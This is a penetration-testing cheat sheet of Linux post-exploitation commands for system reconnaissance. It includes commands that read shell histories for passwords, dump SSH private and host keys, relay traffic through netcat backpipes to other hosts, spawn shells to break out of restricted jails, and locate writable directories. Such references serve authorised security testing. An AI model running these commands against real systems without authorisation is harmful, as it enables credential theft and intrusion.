Below are some useful Linux commands for penetration testing, target reconaissance and capability assessment. Use them for good, not for evil. Part 1 is here.

Identify operating system, kernel version

$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ cat /proc/version   
$ uname -a
$ uname -mrs 
$ rpm -q kernel 
$ dmesg | grep Linux
$ ls /boot | grep vmlinuz-

Identify what other users and hosts are communicating with the system.

$ lsof -i 
$ lsof -i :80
$ grep 80 /etc/services
$ chkconfig --list
$ chkconfig --list | grep 3:on
$ last
$ w
$ netstat -antup
$ netstat -antpx
$ netstat -tulpn

Use scp to copy to/from remote machine.

# Copy remote file to local host:
$ scp your_username@192.168.0.100:<remote_file> /some/local/directory

# Copy local file to remote host:
$ scp <local_file> your_username@192.168.0.100:/some/remote/directory

# Copy local directory to remote directory:
$ scp -r <local_dir> your_username@192.168.0.100:/some/remote/directory/<remote_dir>

# Copy a file from one remote host to another:
$ scp your_username@<host1>:/some/remote/directory/stuff.txt your_username@<host2>:/some/remote/directory/

# Improve scp performance (use blowfish):
$ scp -c blowfish <local_file> your_username@192.168.0.100:/some/remote/directory

If port forwarding is possible, redirect and interact with traffic from another view.

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
$ ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
$ ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
$ mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Retrieve cached IP and/or MAC addresses.

$ route
$ /sbin/route -nee
$ arp -e

What has the user being doing? Any password in plain text?

$ cat ~/.bash_history
$ cat ~/.nano_history
$ cat ~/.atftp_history
$ cat ~/.mysql_history 
$ cat ~/.php_history

Retrieve useful user information

$ cat ~/.bashrc
$ cat ~/.profile
$ cat /var/mail/root
$ cat /var/spool/mail/root

Get any private/public key information

$ cat ~/.ssh/authorized_keys
$ cat ~/.ssh/identity.pub
$ cat ~/.ssh/identity
$ cat ~/.ssh/id_rsa.pub
$ cat ~/.ssh/id_rsa
$ cat ~/.ssh/id_dsa.pub
$ cat ~/.ssh/id_dsa
$ cat /etc/ssh/ssh_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key
$ cat /etc/ssh/ssh_host_key.pub
$ cat /etc/ssh/ssh_host_key

If in a jail, can you break out of it?

$ python -c 'import pty;pty.spawn("/bin/bash")'
$ echo os.system('/bin/bash')
$ /bin/sh -i

Where can written to and executed from?

A few ‘common’ places: /tmp, /var/tmp, /dev/shm

$ find / -writable -type d 2>/dev/null				# world-writeable folders
$ find / -perm -222 -type d 2>/dev/null				# world-writeable folders
$ find / -perm -o+w -type d 2>/dev/null				# world-writeable folders
$ find / -perm -o+x -type d 2>/dev/null				# world-executable folders
$ find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null	# world-writeable & executable folders

Which configuration files can be written in /etc/? Are we able to reconfigure a service?

$ ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null	# Anyone
$ ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null		# Owner
$ ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null	# Group
$ ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null		# Other
$ find /etc/ -readable -type f 2>/dev/null		# Anyone
$ find /etc/ -readable -type f -maxdepth 1 2>/dev/null	# Anyone